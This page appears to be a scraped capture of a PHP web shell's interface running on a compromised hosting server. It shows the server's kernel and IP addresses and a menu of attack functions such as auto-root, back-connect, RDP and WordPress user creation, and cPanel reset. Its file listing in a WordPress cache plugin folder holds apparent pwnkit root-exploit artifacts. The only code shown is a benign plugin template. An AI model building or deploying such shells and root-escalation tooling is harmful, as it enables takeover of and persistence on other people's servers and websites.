Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.223.170.103
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
tpl /
toolbox /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
beta_test.tpl.php
3.19
KB
-rw-r--r--
edit_htaccess.tpl.php
3.36
KB
-rw-r--r--
entry.tpl.php
1.64
KB
-rw-r--r--
heartbeat.tpl.php
3.87
KB
-rw-r--r--
import_export.tpl.php
2.3
KB
-rw-r--r--
log_viewer.tpl.php
2.35
KB
-rw-r--r--
purge.tpl.php
10.3
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
report.tpl.php
4.86
KB
-rw-r--r--
settings-debug.tpl.php
4.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_htaccess.tpl.php
<?php namespace LiteSpeed; defined('WPINC') || exit; $content = null; try { $content = Htaccess::cls()->htaccess_read(); } catch (\Exception $e) { echo '<div class="notice notice-error is-dismissible"><p>' . $e->getMessage() . '</p></div>'; } $htaccess_path = Htaccess::get_frontend_htaccess(); // Check if there is `ExpiresDefault` in .htaccess if (defined('LITESPEED_ON')) { if ($content && stripos($content, "\nExpiresDefault") !== false) { $is_dismissed = GUI::get_option(self::DB_DISMISS_MSG); if ($is_dismissed !== self::RULECONFLICT_DISMISSED) { // Need to add a notice for browser cache compatibility if ($is_dismissed !== self::RULECONFLICT_ON) { GUI::update_option(self::DB_DISMISS_MSG, self::RULECONFLICT_ON); } require_once LSCWP_DIR . 'tpl/inc/show_rule_conflict.php'; } } // don't dismiss the msg automatically // elseif ( $is_dismissed === Cache_Admin_Display::RULECONFLICT_ON ) { // update_option( self::DISMISS_MSG, Cache_Admin_Display::RULECONFLICT_DISMISSED ); // } } ?> <h3 class="litespeed-title"> <?php echo __('LiteSpeed Cache View .htaccess', 'litespeed-cache'); ?> <?php Doc::learn_more('https://docs.litespeedtech.com/lscache/lscwp/toolbox/#view-htaccess-tab'); ?> </h3> <h3 class="litespeed-title-short"> <?php echo __('.htaccess Path', 'litespeed-cache'); ?> </h3> <table class="wp-list-table striped litespeed-table"> <tbody> <tr> <th> <?php echo __('Frontend .htaccess Path', 'litespeed-cache'); ?> </th> <td> <code><?php echo $htaccess_path; ?></code> <div class="litespeed-desc"> <?php echo __('Default path is', 'litespeed-cache'); ?>: <code><?php echo Htaccess::get_frontend_htaccess(true); ?></code> <br /> <font class="litespeed-success"> <?php echo __('API', 'litespeed-cache'); ?>: <?php echo sprintf(__('PHP Constant %s is supported.', 'litespeed-cache'), '<code>LITESPEED_CFG_HTACCESS</code>'); ?> <?php echo sprintf(__('You can use this code %1$s in %2$s to specify the htaccess file path.', 'litespeed-cache'), '<code>defined("LITESPEED_CFG_HTACCESS") || define("LITESPEED_CFG_HTACCESS", "your path on server");</code>', '<code>wp-config.php</code>'); ?> </font> </div> </td> </tr> <tr> <th> <?php echo __('Backend .htaccess Path', 'litespeed-cache'); ?> </th> <td> <?php echo Htaccess::get_backend_htaccess(); ?> <div class="litespeed-desc"> <?php echo __('Default path is', 'litespeed-cache'); ?>: <code><?php echo Htaccess::get_backend_htaccess(true); ?></code> <br /> <font class="litespeed-success"> <?php echo __('API', 'litespeed-cache'); ?>: <?php echo sprintf(__('PHP Constant %s is supported.', 'litespeed-cache'), '<code>LITESPEED_CFG_HTACCESS_BACKEND</code>'); ?> <?php echo sprintf(__('You can use this code %1$s in %2$s to specify the htaccess file path.', 'litespeed-cache'), '<code>defined("LITESPEED_CFG_HTACCESS_BACKEND") || define("LITESPEED_CFG_HTACCESS_BACKEND", "your path on server");</code>', '<code>wp-config.php</code>'); ?> </font> </div> </td> </tr> </tbody> </table> <?php if ($content !== null) : ?> <h3 class="litespeed-title"><?php echo sprintf(__('Current %s Contents', 'litespeed-cache'), '.htaccess'); ?></h3> <h4><?php echo $htaccess_path; ?></h4> <textarea readonly wrap="off" rows="50" class="large-text"><?php echo esc_textarea($content); ?></textarea> <?php endif; ?>
Close